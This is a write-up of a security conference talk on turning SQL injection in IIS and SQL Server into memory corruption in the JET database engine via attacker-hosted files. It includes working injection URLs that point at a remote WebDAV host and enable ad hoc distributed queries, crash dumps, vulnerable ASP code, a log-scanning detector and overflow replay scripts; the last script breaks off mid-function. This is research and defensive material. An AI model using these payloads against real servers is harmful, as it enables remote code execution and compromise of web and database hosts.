SQL Injection IIS

A SQL injection vulnerability was found in an IIS web application using an Access database. By crafting a malicious SQL query, an attacker could exploit this to execute arbitrary code in the IIS process context with the privileges of the DefaultAppPool user. A proof of concept exploit was demonstrated targeting a specific IIS server.


“Give Me a SQL Injection, I Shall PWN IIS and SQL Server”


Tao Yan (@Ga1ois), Qi Deng and Bo Qu
Palo Alto Networks

#BHASIA @BLACKHATEVENTS
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface in IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in SQL Server database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Who Are We
• We are security researchers from Palo Alto Networks
• Tao Yan (@Ga1ois)
• Qi Deng
• Bo Qu
• Regular conference presenters
• Black Hat, CanSecWest, BlueHat, Recon, POC, HITCON, etc.
• Regular top vulnerability contributors for Microsoft, Adobe, Apple, etc.
• Several times in the MSRC Top 10 researchers
Motivation and background
• Is there any new attack surface in IIS and SQL Server?
• Can SQL injection only be used to view data in the database?
• What is Microsoft JET database engine and who can use it?
Motivation and background
• Attack surfaces in IIS and SQL Server are very limited.
Motivation and background
• What is SQL injection?
• Executing unintended SQL queries in the target database.
• What did we previously know SQL injection can do?
• View data in the database.
• What did we previously know SQL injection can NOT do?
• Execute native code in the web application or database process.
• Execute shell commands or read/write arbitrary files without high privileges in specific databases (such as xp_cmdshell as sa in SQL Server).
Motivation and background
• Microsoft JET database engine
• ~30 years old and not well maintained, but still massively used.
• Natively supported on all Windows versions.
Who can use Microsoft JET database engine?
• Office is not an ideal target.
• Neither is wscript.exe.
Motivation and background
• How about combining all three topics?
• Is it possible to use vulnerabilities in the JET database engine to attack IIS and SQL Server, by using a SQL injection to execute arbitrary SQL queries against a remote, attacker-controlled database, and get native code execution in the IIS and SQL Server processes?
Cross Database SQL Query in Access and SQL Server
Access
SELECT * FROM [ExternalDatabase].[table]

SQL Server
SELECT * FROM OPENDATASOURCE('provider', 'Data Source=ExternalDatabase')...[table]

SELECT * FROM OPENROWSET('provider', 'Database=ExternalDatabase', 'SELECT * FROM [table]')

EXEC sp_addlinkedserver
    @server = 'ServerName',
    @srvproduct = 'ServerProduct',
    @provider = 'provider',
    @datasrc = 'ExternalDatabase',
    @provstr = 'ProviderString';
External database and provider
• Can the external database be a different database type, such as a JET database?
Access: uses the JET provider by default: msjet40.dll
SQL Server: JET-related providers:
Microsoft.Jet.OLEDB.4.0 -> msjet40.dll
Microsoft.ACE.OLEDB.12.0 -> acecore.dll
• Can the external database be on a remote server?
UNC path parsing in msjet 4.0
msjet40!ErrTryOpenDatabase receives the UNC path and asks IsForeignDatabase?
• no: msjet40!ErrOpenDatabase
  -> msjet40!IsamOpenDatabase
  -> msjet40!Session::OpenDatabase
  -> msjet40!Database::OpenFile
  -> msjet40!File::Open
  -> msjet40!File::ReallyOpen
  -> msjet40!JetCreateFileW
  -> kernel32!CreateFileW (UNC path)
• yes, via msrd3x40: msjet40!ErrOpenForeignDatabase
  -> msrd3x40!IsamOpenDatabase
  -> msrd3x40!Session::OpenDatabase
  -> msrd3x40!Database::OpenFile
  -> msrd3x40!File::Open
  -> msrd3x40!File::ReallyOpen
  -> msrd3x40!JetCreateFileW
  -> kernel32!CreateFileW (UNC path)
• yes, via msexcl40 (Excel workbook): msjet40!ErrOpenForeignDatabase
  -> msexcl40!WBISAMOpenDatabase
  -> msexcl40!WorkbookOpen
  -> msexcl40!OpenBiffFile
  -> msexcl40!ExcelOpenFile
  -> msexcl40!BFOpenFile
  -> msrd3x40!OSOpenFile
  -> Coml2!StgOpenStorage
  -> Coml2!DfOpenDocFile
  -> Coml2!DfFromName
  -> Coml2!CFileStream::InitWorker
  -> Coml2!CFileStream::Init_OpenOrCreate
  -> kernel32!CreateFileW (UNC path)
UNC path parsing in acecore (msjet 12.0): [call-graph figure not reproduced]
The hidden feature for CreateFile(UNC) in IIS and SQL Server
• CreateFile(UNC) in IIS and SQL Server uses SMB and WebDAV
CreateFile(UNC) with SMB in IIS and SQL Server
• SMB works on Win7, fails on Win10
CreateFile(UNC) with WebDAV in IIS and SQL Server
• WebDAV works on all Windows versions

More features/protocols from msexcl40
int __stdcall WBISAMOpenDatabase(...)
{
    ...
    if ( NetProtocolType((int)pszDest) )
    {
        NetCreateLocalDirectory(Path, 0x105u);
        NetDownloadToLocal(pszDest, 0, Path, FileName, 0x105u);   // WinInet: InternetOpen ... FtpGetFile
        ...
        WorkbookCreate();
        ...
        WorkbookOpen();
        ...
    }
    ...
}
SQL Injection in Access with cross database query

ASP code:
const strDBPath = "database/#data.mdb"
set conn = server.createobject("adodb.connection")
conn.open "DRIVER={Microsoft Access Driver (*.mdb)};DBQ=" + server.mappath(strDBPath) + ";pwd="
id = request("id")
sql = "select * from product where id=" & id
set rs = conn.execute(sql)

Injected parameter:
id=1513 and (SELECT [fc4] FROM [Excel 8.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8])

Resulting query:
sql = select * from product where id=1513 and (SELECT [fc4] FROM [Excel 8.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8])
Cross database query call stack in IIS + ASP + Access (innermost frame first)
msjet40!ErrTryOpenDatabase
odbc32 + odbcjt32
msado15 + msdasql
vbscript
asp
SQL Injection in SQL Server with cross database query

ASP code:
set conn = server.createobject("adodb.connection")
conn.open "provider=sqloledb;data source=DESKTOP-32BIT\SQLEXPRESS;uid=test;pwd=123456;database=testdb"
id = request("id")
sql = "select * from persons where personid=" & id
set rs = conn.execute(sql)

Injected parameter:
id=1;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0', 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;

Resulting query:
sql = select * from persons where personid=1;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0', 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;
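The two injections above, and the bare-UNC form used in Scenario 1 ([\\host/webdav/x.mdb].[table]), all leave a recognisable shape in the request log: a bracketed JET connect string, an OPENDATASOURCE/OPENROWSET/sp_addlinkedserver call, the sp_configure step that turns on "Ad Hoc Distributed Queries", and a UNC path that names the attacker's WebDAV host. The following detector is an added example for this page, not code from the talk or from Palo Alto Networks; the indicator names and regexes are my own, and the IIS W3C log lines are constructed here from the slide payloads.

```python
import re
from urllib.parse import unquote

# Indicators over the decoded, lower-cased cs-uri-query. The names are this
# example's own, not a vendor signature set.
INDICATORS = [
    ("opendatasource", re.compile(r"opendatasource\s*\(")),
    ("openrowset", re.compile(r"openrowset\s*\(")),
    ("sp_addlinkedserver", re.compile(r"sp_addlinkedserver")),
    ("ad_hoc_enable", re.compile(r"ad\s+hoc\s+distributed\s+queries")),
    # JET ISAM connect string used as a table source: [Excel 8.0;Database=...].[tbl]
    ("jet_isam_source", re.compile(r"\[[^\]]*;\s*database\s*=")),
    # UNC path used directly as the database: [\\host\share\x.mdb].[tbl]
    ("unc_database", re.compile(r"\[\\\\[^\]]+\]\s*\.\s*\[")),
]
# Remote host of a UNC path; the slides use both \\host\path and \\host/path.
UNC_HOST = re.compile(r"\\\\([A-Za-z0-9_.-]+)[\\/]")
PCT = re.compile(r"%[0-9A-Fa-f]{2}")


def decode_query(cs_uri_query):
    """Percent-decode once, and again if the result still looks encoded
    (double encoding is a common filter-evasion trick)."""
    decoded = unquote(cs_uri_query)
    if PCT.search(decoded):
        decoded = unquote(decoded)
    return decoded


def analyze_query(cs_uri_query):
    decoded = decode_query(cs_uri_query)
    low = decoded.lower()
    return {
        "decoded": decoded,
        "indicators": [name for name, rx in INDICATORS if rx.search(low)],
        "unc_hosts": sorted(set(UNC_HOST.findall(decoded))),
    }


def scan_w3c_log(lines):
    """Walk W3C extended log lines; the #Fields header names the columns.
    Returns one finding per request whose query string hits an indicator."""
    fields, findings = None, []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        cols = dict(zip(fields, line.split()))
        query = cols.get("cs-uri-query", "-")
        if query == "-":
            continue
        result = analyze_query(query)
        if result["indicators"]:
            findings.append({
                "client": cols.get("c-ip"),
                "uri": cols.get("cs-uri-stem"),
                "indicators": result["indicators"],
                "unc_hosts": result["unc_hosts"],
            })
    return findings


# Constructed sample log: one benign request, then the three slide payloads
# (Access/Excel ISAM, Access/UNC .mdb, SQL Server/OPENDATASOURCE).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2021-05-06 10:00:00 10.0.0.5 GET /access_injection.asp id=1513 200
2021-05-06 10:00:01 10.0.0.9 GET /access_injection.asp id=1513%20and%20(SELECT%20[fc4]%20FROM%20[Excel%208.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8]) 500
2021-05-06 10:00:02 10.0.0.9 GET /access_injection.asp id=1513%20and%20(SELECT%20TOP%2044%20[ft4].[fc3]%20AS%20[c01]%20FROM%20[\\10.2.156.63/webdav/poc7c.mdb].[ft4]%20WHERE%20[ft4].[fc3]%20%3C%3E%202%20GROUP%20BY%20[ft4].[fc3]) 500
2021-05-06 10:00:03 10.0.0.9 GET /mssql_injection.asp id=1;exec%20sp_configure%20%27show%20advanced%20options%27,%201;RECONFIGURE;exec%20sp_configure%20%27Ad%20Hoc%20Distributed%20Queries%27,%201;RECONFIGURE;UPDATE%20opendatasource(%27Microsoft.ACE.OLEDB.12.0%27,%20%27data%20source=\\10.2.156.63\webdav\poc42cf.mdb%27)...[ft8]%20SET%20[fc3]%20=%20[fc3]%20%2b%2047774%20WHERE%20[fc3]%20%3C=%207%20OR%20[fc2]%20%3C=%205; 500
"""

if __name__ == "__main__":
    for finding in scan_w3c_log(SAMPLE_LOG.splitlines()):
        print(finding)
```

The UNC host is the useful pivot: it is the address w3wp.exe or sqlservr.exe will contact over WebDAV, so it can be matched against proxy or firewall logs for outbound connections from the web or database tier.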
Msjet 4.0 cross database query call stack in SQL Server (innermost frame first)
msjet40!JetOpenDatabase
msjetoledb40
oledb32
sqllang
sqldk

Msjet 12.0 (acecore) cross database query call stack in SQL Server (innermost frame first)
aceoledb + acecore
oledb32
sqllang + sqlmin
sqldk
A new remote attack surface on IIS and SQL Server
• The new attack surface
• The capability of executing any SQL query against any attacker-controllable database from inside IIS and SQL Server, based on a SQL injection.
• Fuzzing based on mutations of SQL queries and of JET database files.
• Code development and testing are based on a correct database file.
• It is a huge gold mine: we have found ~100 vulnerabilities here.
• Limitations
• Only SELECT queries are available in the Access database.
• acecore is not installed by default.
Scenario 1: IIS + Access

Database: Access
Target: SQL injection
Database requirement: default setup
Vulnerable privilege: N/A
Supported components: all JET 4.0 components (msjet40, msrd3x40, msexcl40, etc.)
SQL in SQL injection: SELECT query only
Trigger: one single web request
Security boundary: from a SQL injection in Access to IIS DoS, info leak or RCE as DefaultAppPool in the w3wp.exe process.
Scenario 1: IIS + Access, CVE-2021-XXXX

http://127.0.0.1/access_injection.asp?id=1513%20and%20(SELECT TOP 44 [ft4].[fc3] AS [c01] FROM [\\10.2.156.63/webdav/poc7c.mdb].[ft4] WHERE [ft4].[fc3] <> 2 GROUP BY [ft4].[fc3])
Scenario 1: IIS + Access, CVE-2021-XXXX
6a0e166a lea eax,[esi+34h] <-- esi is the TableMover object
6a0e166d je msrd3x40!TableMover::RecordAddress+0x59 (6a0e1679)
6a0e166f cmp dword ptr [esi+10h],0
6a0e1673 je msrd3x40!TableMover::RecordAddress+0x1f3 (6a0e1813)
6a0e1679 push eax
6a0e167a push dword ptr [esi+0Ch]
6a0e167d mov ecx,edi
6a0e167f call msrd3x40!DataPage::RecordAddress (6a0bb410) <-- esi+0x34 was set in it
6a0e1684 cmp eax,4 <-- eax=1 when 0x4800
6a0e1687 ja msrd3x40!TableMover::RecordAddress+0x148 (6a0e1768)
6a0e168d jmp dword ptr msrd3x40!TableMover::RecordAddress+0x288 (6a0e18a8)[eax*4]
6a0e1694 mov eax,dword ptr [esi+34h] <-- eax is from esi+0x34; jump case 1
6a0e1697 lea ebx,[esi+24h]
6a0e169a mov ecx,ebx
6a0e169c mov edi,dword ptr [eax] ds:002b:26de7000=????????
Scenario 1: IIS + Access, CVE-2021-XXXX
msrd3x40!TableMover before:
0b7e4fb8 6a0a63cc 15302e90 00000000 0000ff02
0b7e4fc8 00000000 26dd2cd4 26de6800 00000001
0b7e4fd8 c0c0c0c0 00000000 00000000 c0c0c0c0
0b7e4fe8 c0c0c0c0 00000000 00000000 00000000
0b7e4ff8 00000000

msrd3x40!TableMover after (esi+0x34 at 0b7e4fec now holds 26de7000, the end of the allocation):
0b7e4fb8 6a0a63cc 15302e90 00000000 0000ff02
0b7e4fc8 00000000 26dd2cd4 26de6800 00000001
0b7e4fd8 c0c0c0c0 00000000 00000000 c0c0c0c0
0b7e4fe8 c0c0c0c0 26de7000 00000000 00000000
0b7e4ff8 00000000

0:020:x86> !address 26de6800
Usage: <unknown>
Base Address: 00000000`26dd0000
End Address: 00000000`26de7000

0:020:x86> db 26de6800
26de6800 09 01 d6 07 14 00 00 00-10 00 00 c8 00 c8 00 48
26de6810 00 c8 00 c8 00 c8 00 c8-00 c8 00 c8 00 c8 00 c8
26de6820 00 c8 00 c8 00 c8 00 c8-00 c8 00 ff ff 00 00 00
26de6830 00 00 00 00 00 00 00 00-00 00 12 00 00 00 00 00
26de6840 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6850 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6860 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6870 00 00 00 61 72 74 6c 61-72 2e 53 00 00 00 00 00
How to find CVE-2021-XXXX
• SELECT TOP 44 [ft4].[fc3] AS [c01] FROM [\\10.2.156.63/webdav/poc7c.mdb].[ft4] WHERE [ft4].[fc3] <> 2 GROUP BY [ft4].[fc3]
• Power of database file mutations
[figure: original vs. mutated database file, not reproduced]
CVE-2021-XXXX Demo
Scenario 2: IIS + SQL Server

Database: SQL Server 32-bit
Target: SQL injection
Database requirement: default setup
Vulnerable privilege in SQL injection: public with ad hoc distributed queries enabled, or SA to enable ad hoc access to the remote database
Supported components: all JET components (msjet40, msrd3x40, msexcl40, acecore, etc.)
SQL: all SQL queries, multiple statements, action queries and cross-table queries
Trigger: one single web request
Security boundary: from a SQL injection in SQL Server to SQL Server DoS, info leak or RCE as the MSSQLSERVER user in the sqlservr.exe process.

Database: SQL Server 64-bit
Target: SQL injection
Database requirement: Access Redistributable installed
Vulnerable privilege in SQL injection: public with ad hoc distributed queries enabled, or SA to enable ad hoc access to the remote database
Supported components: acecore
SQL: all SQL queries, multiple statements, action queries and cross-table queries
Trigger: one single web request
Security boundary: as for 32-bit.
Scenario 2: IIS + SQL Server, CVE-2020-1711

http://127.0.0.1/mssql_injection.asp?id=1;exec%20sp_configure%20%27show%20advanced%20options%27,%201;RECONFIGURE;exec%20sp_configure%20%27Ad%20Hoc%20Distributed%20Queries%27,%201;RECONFIGURE;UPDATE%20opendatasource(%27Microsoft.ACE.OLEDB.12.0%27,%20%27data%20source=\\10.2.156.63\webdav\poc42cf.mdb%27)...[ft8]%20SET%20[fc3]%20=%20[fc3]%20%2b%2047774%20WHERE%20[fc3]%20%3C=%207%20OR%20[fc2]%20%3C=%205;

Decoded, the injected id parameter is:
1;exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries', 1;RECONFIGURE;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0', 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;
Scenario 2: IIS + SQL Server, CVE-2020-1711
Before overflow:
0:000> dc 1ca2efd8
1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000 ...9...........
1ca2efe8 00000020 00000000 1ca2effc 00000004 ...............
1ca2eff8 00000000 00000000 00000000 00000000 ................
1ca2f008 00000000 00000000 00000000 00000000 ................
1ca2f018 00000000 00000000 00000003 feff0000 ................
1ca2f028 32312e30 34323133 38373635 31353637 0.12312456787651
1ca2f038 35333432 37353634 30feff32 3332312e 243546572..0.123
1ca2f048 35343231 37383736 32313536 34353334 1245678765124354
1ca2f058 32373536 31353433 33353433 33343632 6572345134532643
1ca2f068 2e002837 01000600 00000700 00000000 7(..............

After overflow:
0:000> dd 1ca2efd8
1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000
1ca2efe8 00000020 00000000 37a30afc 1b001b04
1ca2eff8 1b001b00 1b001b00 1b001b00 1b001b00
1ca2f008 1b001b00 1b001b00 1b001b00 1b001b00
1ca2f018 1b001b00 1b001b00 1b001b03 19ff1b00
1ca2f028 4d314931 4f324c33 53375135 4c355137
1ca2f038 50334f32 52355134 4bff1a32 4e324c2e
1ca2f048 50344d31 52385236 4d315036 4f354e34
1ca2f058 4d375036 4c354f33 4e354f33 4e345132
1ca2f068 49004337 01002100 00000700 00000000

Crash info:
This exception may be expected and handled.
eax=00000000 ebx=1b001b00 ecx=1ca2efff edx=00000000 esi=1b001b04 edi=37a30afc
eip=5bdb43df esp=028fd4dc ebp=028fd67c
ACECORE+0x43df:
5bdb43df 220c07 and cl,byte ptr [edi+eax] ds:002b:37a30afc=??

0:000> !heap -p -a 0x1ca2efd8
address 1ca2efd8 found in
_DPH_HEAP_ROOT @ 6181000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize )
1c562410: 1ca2efd8 1024
Scenario 2: IIS + SQL Server, CVE-2020-1711
; Out of boundary write
5be4fe7d 8b4d10 mov ecx,dword ptr [ebp+10h] ; length ecx = 0x3e, which is defined in the database file
5be4fe80 8b45d4 mov eax,dword ptr [ebp-2Ch] ; value buffer to be updated
5be4fe83 41 inc ecx ; ecx = 0x3f
5be4fe84 8b5508 mov edx,dword ptr [ebp+8] ; from arg, dx = 0x1b
5be4fe87 660110 add word ptr [eax],dx ; add 0x1b to each word value in the buffer
5be4fe8a 8d40fe lea eax,[eax-2] ; move buffer pointer
5be4fe8d 83e901 sub ecx,1
5be4fe90 75f5 jne ACECORE+0x9fe87 (5be4fe87) ; loop

0:000> dw 1ca2f06d - 3f*2
1ca2efef fc00 a2ef 041c 0000 0000 0000 0000 0000
1ca2efff 0000 0000 0000 0000 0000 0000 0000 0000
1ca2f00f 0000 0000 0000 0000 0000 0000 0000 0000
1ca2f01f 0300 0000 0000 ff00 30fe 312e 3332 3231
1ca2f02f 3534 3736 3738 3536 3231 3334 3435 3536
1ca2f03f 3237 feff 2e30 3231 3133 3432 3635 3837
1ca2f04f 3637 3135 3432 3533 3634 3735 3332 3534
1ca2f05f 3331 3534 3233 3436 3733 0028 002e 0006

The length should be 0x28 (0x50/2), but it is 0x3e, so an out of boundary write happens.
Where does the length 0x3e come from? Is it controllable? Is there any check?
0:000> dc 1ca2efd8
1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000 ...9...........
1ca2efe8 00000020 00000000 1ca2effc 00000004 ...............
1ca2eff8 00000000 00000000 00000000 00000000 ................
1ca2f008 00000000 00000000 00000000 00000000 ................
1ca2f018 00000000 00000000 00000003 feff0000 ................
1ca2f028 32312e30 34323133 38373635 31353637 0.12312456787651
1ca2f038 35333432 37353634 30feff32 3332312e 243546572..0.123
1ca2f048 35343231 37383736 32313536 34353334 1245678765124354
1ca2f058 32373536 31353433 33353433 33343632 6572345134532643
1ca2f068 2e002837 01000600 00000700 00000000 7(..............

eax=1c9d1f38 ebx=1ca28e50 ecx=1c9b7800 edx=1c9b7800 esi=1ca2efd8 edi=028fda0c
eip=5bdd0ce9 esp=028fd974 ebp=028fd98c
ACECORE+0x20ce9:
5bdd0ce9 8b7810 mov edi,dword ptr [eax+10h] ds:002b:1c9d1f48=0000003e
0:000> dc 1c9d1f38
1c9d1f38 5bf0f5fc 1c9d1f78 00000006 00000003 ...[x...........
1c9d1f48 0000003e 00000004 00000003 00000409 >...............
1c9d1f58 00010000 c0c0c0c0 00000000 00000000 ................
1c9d1f68 1c9b7e40 1c9b7800 00000000 00000000 @~...x..........
1c9d1f78 00630066 00000033 c0c0c0c0 c0c0c0c0 f.c.3...........
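The loop above can be replayed on the "before overflow" dump to confirm the analysis. The following is an added example, not code from the talk: it copies the 0x1ca2efd8 dump into a bytearray, runs the ACECORE loop (ecx = length + 1 iterations of "add word ptr [eax],dx; eax -= 2") from 0x1ca2f06d with dx = 0x1b and the file-supplied length 0x3e, and reproduces the "after overflow" words, including the corrupted pointer 37a30afc that lands in edi at the crash. The start address and the values come from the slide; the function names and the 0x50-byte buffer size used by `length_fits` are this example's own reading of the slide.

```python
import struct

BASE = 0x1CA2EFD8
# 'Before overflow' dump from the slide (dc 1ca2efd8), as little-endian dwords.
BEFORE = [
    0x1CA2F020, 0x00000039, 0x00000FDC, 0x1CA2F000,
    0x00000020, 0x00000000, 0x1CA2EFFC, 0x00000004,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00000003, 0xFEFF0000,
    0x32312E30, 0x34323133, 0x38373635, 0x31353637,
    0x35333432, 0x37353634, 0x30FEFF32, 0x3332312E,
    0x35343231, 0x37383736, 0x32313536, 0x34353334,
    0x32373536, 0x31353433, 0x33353433, 0x33343632,
    0x2E002837, 0x01000600, 0x00000700, 0x00000000,
]
LOOP_START = 0x1CA2F06D   # eax when the loop starts (from 'dw 1ca2f06d - 3f*2')
FILE_LENGTH = 0x3E        # [ebp+10h]: the column length read from the .mdb file
DELTA = 0x1B              # dx: the value added to every word


def snapshot():
    return bytearray(b"".join(struct.pack("<I", d) for d in BEFORE))


def dword(mem, addr):
    return struct.unpack_from("<I", mem, addr - BASE)[0]


def update_loop(mem, start, length, delta):
    """ACECORE+0x9fe7d..0x9fe90 as on the slide: ecx = length + 1, then
    repeat { add word ptr [eax], dx; eax -= 2 } ecx times. Nothing checks
    that eax stays inside the value buffer. Returns the lowest address written."""
    addr = start
    for _ in range(length + 1):
        off = addr - BASE
        w = struct.unpack_from("<H", mem, off)[0]
        struct.pack_into("<H", mem, off, (w + delta) & 0xFFFF)
        addr -= 2
    return addr + 2


def changed_dwords(before, after):
    """Dword-aligned addresses whose contents differ between two snapshots."""
    return [BASE + 4 * i for i in range(len(before) // 4)
            if before[4 * i:4 * i + 4] != after[4 * i:4 * i + 4]]


def length_fits(length_words, buffer_bytes):
    """The check the loop lacks: length + 1 word adds must fit inside the
    buffer that really holds the value (0x50 bytes = 0x28 words per the slide)."""
    return (length_words + 1) * 2 <= buffer_bytes


def replay():
    before, after = snapshot(), snapshot()
    lowest = update_loop(after, LOOP_START, FILE_LENGTH, DELTA)
    return before, after, lowest


if __name__ == "__main__":
    before, after, lowest = replay()
    print("lowest address written: %#x" % lowest)
    for a in changed_dwords(before, after)[:4]:
        print("%08x: %08x -> %08x" % (a, dword(before, a), dword(after, a)))
    print("length 0x3e fits a 0x50-byte buffer:", length_fits(FILE_LENGTH, 0x50))
```

The replay shows why the crash site is where it is: the 0x3f word adds walk down from 0x1ca2f06d past the string data and into the words at 0x1ca2eff0 and 0x1ca2eff4, which the "before" dump shows holding a pointer (1ca2effc) and a count (4); after the loop they read 37a30afc and 1b001b04, exactly the edi and esi values in the access violation.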
How to find CVE-2020-1711
• UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0', 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5
• Power of mutations on the database file
[figure: mutated vs. original database file, not reproduced]
CVE-2020-1711 Demo
Scenario 3: IIS + Web Shell

Target: web shell
Requirement: default setup, or Access Redistributable installed
Supported components: all JET components (msjet40, msrd3x40, msexcl40, acecore, etc.)
SQL: all SQL queries, multiple statements, action queries and cross-table queries
Trigger: use the database module in the web shell
Security boundary: bypass restrictions of the web shell cmd module; from web shell to native code execution as DefaultAppPool in the w3wp.exe process.
Scenario 3: IIS + Web Shell, CVE-2020-17062
[web shell screenshots not reproduced]
Scenario 3: IIS + Web Shell, CVE-2020-17062
acecore!PageDesc before:
0:000> dd 18071008
18071008 5bf10d58 00000000 1c7b4c8c 00000094
18071018 18071008 1c7b4bf0 00000000 00000020
18071028 18072000 00000028 18072000 00000028
18071038 18072000 00000028 18072000 00000028
18071048 18072000 00000005 00000000 00000005
18071058 00000000 00000005 00000000 00000000
18071068 0000000e 00000000 073de922 00000000
18071078 00000000 00000000 00000000

acecore!PageDesc after:
0:000> dc 18071008-40
18070fc8 00000000 00000000 34000000 00800000 ...........4....
18070fd8 00000000 5c000000 31007800 5c003200 .......\.x.1.2.\
18070fe8 34007800 36003500 78005c00 32003100 .x.4.5.6.\.x.1.2
18070ff8 31003300 33003500 5c003500 66007800 .3.1.5.3.5.\.x.f
18071008 41004100 67007800 47006700 01040704 .A.A.x.g.g.G....
18071018 18073f00 1c73cbf0 00000000 00000020 .?....s..... ...
18071028 18072000 00000028 18072000 00000028 . ..(.... ..(...
18071038 18072000 00000028 18072000 00000028 . ..(.... ..(...

Triggering query:
UPDATE [ft7] SET [fc3] = 35252, [fc0] = 4, [fc2] = '\x12\x456\x1231535\xfAAxgg', [fc4] = '%', [fc1] = 10 WHERE [ft7].[fc3] <= 120340536294792540.12312341125125;

(618.20b8): Access violation - code c0000005 (first chance)
eax=41004100 ebx=00000014 ecx=18071008 edx=00000007 esi=67007800 edi=1c73cc8c
eip=5bddf672 esp=02afeea8 ebp=02afeecc
ACECORE+0x2f672:
5bddf672 ff10 call dword ptr [eax] ds:002b:41004100=????????
Scenario 3: IIS + Web Shell, CVE-2020-17062

0:000> !heap -p -a 0x1ff47020


address 1ff47020 found in
_DPH_HEAP_ROOT @ 6431000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize)
1fda3784: 1ff46fd8 1024

0:000> dd 1ff46fd8
1ff46fd8 1ff47020 0000044e 00000fdc 1ff47000
1ff46fe8 00000020 00000000 1ff46ffc 00000004
1ff46ff8 00000000 00000001 0000001f 00000000
1ff47008 00000000 00000000 00000000 00000000
1ff47018 00000000 00000000 9c400006 00000000
1ff47028 000a0000 00000000 00000000 00000000
Scenario 3: IIS + Web Shell, CVE-2020-17062
memcpy((void *)(v5 + (*(_WORD *)(v5 + 2 * 0 + 14) & 0x3FFF)), 0x1ff47020, 0x44e);

0:000> dd 18070000    ; v5, size = 0x1000
18070000 03480101 00000074 00000000 0bcc00d8
18070010 035c0778 00000000 00000000 00000000

Overflow! 0x44e > 0x434 (0x1000 - 0xbcc)

dst:
0:000> dd 18070bcc + 43c
18071008 5bf10d58 00000000 1c73cc8c 00000094
18071018 18071008 1c73cbf0 00000000 00000020
18071028 18072000 00000028 18072000 00000028
18071038 18072000 00000028 18072000 00000028
18071048 18072000 00000005 00000000 00000005
18071058 00000000 00000005 00000000 00000000
18071068 0000000e 00000000 073783ce 00000000
18071078 00000000 00000000 00000000 5bf10d58

src:
0:000> dc 1ff47020 + 3fc
1ff4741c 00000000 00000000 34000000 00800000 ...........4....
1ff4742c 00000000 5c000000 31007800 5c003200 .......\.x.1.2.\
1ff4743c 34007800 36003500 78005c00 32003100 .x.4.5.6.\.x.1.2
1ff4744c 31003300 33003500 5c003500 66007800 .3.1.5.3.5.\.x.f
0:000> dc 1ff47020 + 43c
1ff4745c 41004100 67007800 47006700 01040704 .A.A.x.g.g.G....
1ff4746c 00003f00 00000000 00000000 00000000 .?..............
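The memcpy above can be modelled end to end to see how the UTF-16 value from the UPDATE becomes a vtable pointer. The following is an added example, not code from the talk: it lays out the 0x1000-byte page at 0x18070000 with the header words from the slide (so the row offset read at page+14 is 0xbcc), puts the PageDesc object at 0x18071008 right behind the page, fills the tail of the 0x44e-byte source with the bytes shown in the src dump, and performs the unchecked copy. Bytes the slides do not show are zero-filled, which is an assumption of this model, and the function names are this example's own.

```python
import struct

PAGE_BASE = 0x18070000      # v5: the 0x1000-byte JET data page
PAGE_SIZE = 0x1000
PAGEDESC = 0x18071008       # acecore!PageDesc object placed right after the page
SRC_LEN = 0x44E             # memcpy length from the slide
MEM_SIZE = 0x1080           # modelled region: the page plus the object behind it

# dd 18070000 from the slide; the word at +14 (0x0bcc) is the row's offset in the page.
PAGE_HEADER = [0x03480101, 0x00000074, 0x00000000, 0x0BCC00D8,
               0x035C0778, 0x00000000, 0x00000000, 0x00000000]
# dd 18070bcc+43c 'before' from the slide: the PageDesc, vtable pointer first.
PAGEDESC_BEFORE = [0x5BF10D58, 0x00000000, 0x1C73CC8C, 0x00000094,
                   0x18071008, 0x1C73CBF0, 0x00000000, 0x00000020,
                   0x18072000, 0x00000028, 0x18072000, 0x00000028,
                   0x18072000, 0x00000028, 0x18072000, 0x00000028]
# Tail of the source (dc 1ff47020+3fc / +43c). The injected UTF-16 string
# '\x12\x456\x1231535\xfAAxgg' occupies source offsets 0x413..0x446.
SRC_TAIL_OFFSET = 0x3FC
SRC_TAIL = [0x00000000, 0x00000000, 0x34000000, 0x00800000,
            0x00000000, 0x5C000000, 0x31007800, 0x5C003200,
            0x34007800, 0x36003500, 0x78005C00, 0x32003100,
            0x31003300, 0x33003500, 0x5C003500, 0x66007800,
            0x41004100, 0x67007800, 0x47006700, 0x01040704,
            0x00003F00]


def pack(dwords):
    return b"".join(struct.pack("<I", d) for d in dwords)


def build_memory():
    """Page at PAGE_BASE with the slide's header, PageDesc at PAGEDESC;
    everything else zero (assumption)."""
    mem = bytearray(MEM_SIZE)
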